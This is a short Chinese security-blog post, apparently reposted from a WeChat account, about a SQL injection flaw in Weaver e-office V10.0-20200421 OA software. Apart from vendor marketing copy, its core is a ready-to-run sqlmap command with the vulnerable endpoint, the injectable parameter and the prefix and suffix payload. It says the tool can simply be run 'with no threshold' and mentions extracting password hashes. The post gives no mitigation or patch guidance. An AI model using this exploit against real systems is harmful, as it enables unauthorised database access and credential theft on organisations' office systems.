泛微eoffice10-20200421注入漏洞

  • A+
所属分类:安全文章


泛微品牌影响力:

20年 专注OA的研发创新

OA软件领域 首家 主板上市公司

协同行业 “国家 重点 软件企业”

全国 200多个 本地化服务机构

中国高端移动办公协同OA的专业厂商


  

  泛微e-office深谙改革之道以迎变革之机,沉心产品研发数十载之久,全新产品e-office10.0正式上线,力求为用户提供更极致、更优质的产品体验。

  e-office10.0无论是在安全性、扩展性还是智能性方面,都进行了一次完美蜕变。在原版本基础上,V10.0主要具有10项优势。

  全新上线的e-office10.0在产品性能上做了进一步提升,无论是在安全性、扩展性还是智能性方面,都进行了一次完美蜕变。


漏洞存在的版本:

V10.0-20200421

泛微eoffice10-20200421注入漏洞


注入点位置:

python sqlmap.py -u "http://127.0.0.1:8010/eoffice10/server/ext/system_support/leave_record.php?flow_id=1&run_id=1&table_field=1&table_field_name=user()&max_rows=10" --prefix="') " --suffix="%23" -p run_id

PS:table_field=*也可以

放进sqlmap直接跑就可以,无门槛~

缺陷是跑出来的密文无法解密,蛋疼的很


泛微eoffice10-20200421注入漏洞

本文始发于微信公众号(安全微焦点):泛微eoffice10-20200421注入漏洞

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: